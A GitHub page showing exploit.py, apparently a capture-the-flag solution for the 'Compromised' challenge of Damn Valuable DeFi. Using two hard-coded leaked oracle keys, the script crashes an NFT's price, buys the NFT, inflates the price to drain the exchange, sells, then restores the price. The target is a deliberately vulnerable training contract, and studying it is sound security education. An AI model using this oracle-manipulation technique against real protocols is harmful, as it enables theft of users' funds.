-
Notifications
You must be signed in to change notification settings - Fork 2
/
exploit.py
42 lines (31 loc) · 1.57 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
from brownie import DamnValuableNFT, Exchange, TrustfulOracle, accounts
from scripts.deploy import EXCHANGE_INITIAL_ETH_BALANCE, INITIAL_NFT_PRICE
COMPROMISED_PRIVATE_KEY_1 = (
'0xc678ef1aa456da65c6fc5861d44892cdfac0c6c8c2560bf0c9fbcdae2f4735a9'
)
COMPROMISED_PRIVATE_KEY_2 = (
'0x208242c40acdfa9ed889e685c23547acbed9befc60371e9875fbcd736340bb48'
)
def exploit(oracle_contract, exchange_contract, dvnft_contract, attacker_account):
# Attacker controls the private keys of two of the trusted sources
# it would be possible to use them to setup accounts:
compromised_account_1 = accounts.add(COMPROMISED_PRIVATE_KEY_1)
compromised_account_2 = accounts.add(COMPROMISED_PRIVATE_KEY_2)
oracle_contract.postPrice('DVNFT', 1, {'from': compromised_account_1})
oracle_contract.postPrice('DVNFT', 1, {'from': compromised_account_2})
cheap_nft = exchange_contract.buyOne({'from': attacker_account, 'value': 1})
token_id = cheap_nft.events['Transfer']['tokenId']
oracle_contract.postPrice(
'DVNFT', EXCHANGE_INITIAL_ETH_BALANCE + 1, {'from': compromised_account_1}
)
oracle_contract.postPrice(
'DVNFT', EXCHANGE_INITIAL_ETH_BALANCE + 1, {'from': compromised_account_2}
)
dvnft_contract.approve(exchange_contract, token_id, {'from': attacker_account})
exchange_contract.sellOne(token_id, {'from': attacker_account})
oracle_contract.postPrice(
'DVNFT', INITIAL_NFT_PRICE, {'from': compromised_account_1}
)
oracle_contract.postPrice(
'DVNFT', INITIAL_NFT_PRICE, {'from': compromised_account_2}
)